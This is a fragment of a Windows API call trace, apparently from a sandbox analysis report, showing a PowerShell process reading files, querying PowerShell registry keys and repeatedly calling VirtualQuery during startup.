	[0406.779] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.781] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.781] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.781] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.781] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.781] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.782] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.782] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.782] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.782] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.782] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.783] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.783] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.783] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.783] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.784] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.784] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.786] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.786] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.786] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.786] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.787] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.787] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.787] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.787] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.787] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1b4, lpOverlapped=0x0) returned 1
	[0406.787] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x0, lpOverlapped=0x0) returned 1
	[0406.788] CloseHandle (hObject=0x1c0) returned 1
	[0406.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0406.788] SetErrorMode (uMode=0x1) returned 0x1
	[0406.788] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d420 | out: lpFileInformation=0x20d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0406.788] SetErrorMode (uMode=0x1) returned 0x1
	[0406.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0406.788] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d508 | out: phkResult=0x20d508*=0x1c0) returned 0x0
	[0406.788] RegQueryValueExW (in: hKey=0x1c0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d48c, lpData=0x0, lpcbData=0x20d488*=0x0 | out: lpType=0x20d48c*=0x1, lpData=0x0, lpcbData=0x20d488*=0x56) returned 0x0
	[0406.789] CoTaskMemAlloc (cb=0x5a) returned 0x1b8a6b70
	[0406.789] RegQueryValueExW (in: hKey=0x1c0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d45c, lpData=0x1b8a6b70, lpcbData=0x20d458*=0x56 | out: lpType=0x20d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d458*=0x56) returned 0x0
	[0406.789] CoTaskMemFree (pv=0x1b8a6b70) 
	[0406.789] RegCloseKey (hKey=0x1c0) returned 0x0
	[0406.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0406.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0407.588] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.597] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.597] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.598] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.598] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.598] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.598] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.600] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.026] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.027] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.028] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.028] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.029] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.030] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.032] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.033] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.039] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.044] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.044] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.045] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.045] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.045] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.046] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.046] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.046] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.046] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.047] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.047] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.047] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.047] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.049] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.050] VirtualQuery (in: lpAddress=0x20c200, lpBuffer=0x20d0c0, dwLength=0x30 | out: lpBuffer=0x20d0c0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.050] VirtualQuery (in: lpAddress=0x20c200, lpBuffer=0x20d0c0, dwLength=0x30 | out: lpBuffer=0x20d0c0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.050] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.426] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.870] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.871] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.872] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.883] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0408.883] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0408.883] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0408.889] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.292] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.293] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.295] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.296] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.297] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.298] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.299] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.300] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0409.300] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d6a8 | out: phkResult=0x20d6a8*=0x1c0) returned 0x0
	[0409.300] RegQueryValueExW (in: hKey=0x1c0, lpValueName="path", lpReserved=0x0, lpType=0x20d6bc, lpData=0x0, lpcbData=0x20d6b8*=0x0 | out: lpType=0x20d6bc*=0x1, lpData=0x0, lpcbData=0x20d6b8*=0x74) returned 0x0
	[0409.300] RegQueryValueExW (in: hKey=0x1c0, lpValueName="path", lpReserved=0x0, lpType=0x20d62c, lpData=0x0, lpcbData=0x20d628*=0x0 | out: lpType=0x20d62c*=0x1, lpData=0x0, lpcbData=0x20d628*=0x74) returned 0x0
	[0409.300] CoTaskMemAlloc (cb=0x78) returned 0x2f59d0
	[0409.300] RegQueryValueExW (in: hKey=0x1c0, lpValueName="path", lpReserved=0x0, lpType=0x20d5fc, lpData=0x2f59d0, lpcbData=0x20d5f8*=0x74 | out: lpType=0x20d5fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x20d5f8*=0x74) returned 0x0
	[0409.301] CoTaskMemFree (pv=0x2f59d0) 
	[0409.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x20d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0409.301] SetErrorMode (uMode=0x1) returned 0x1
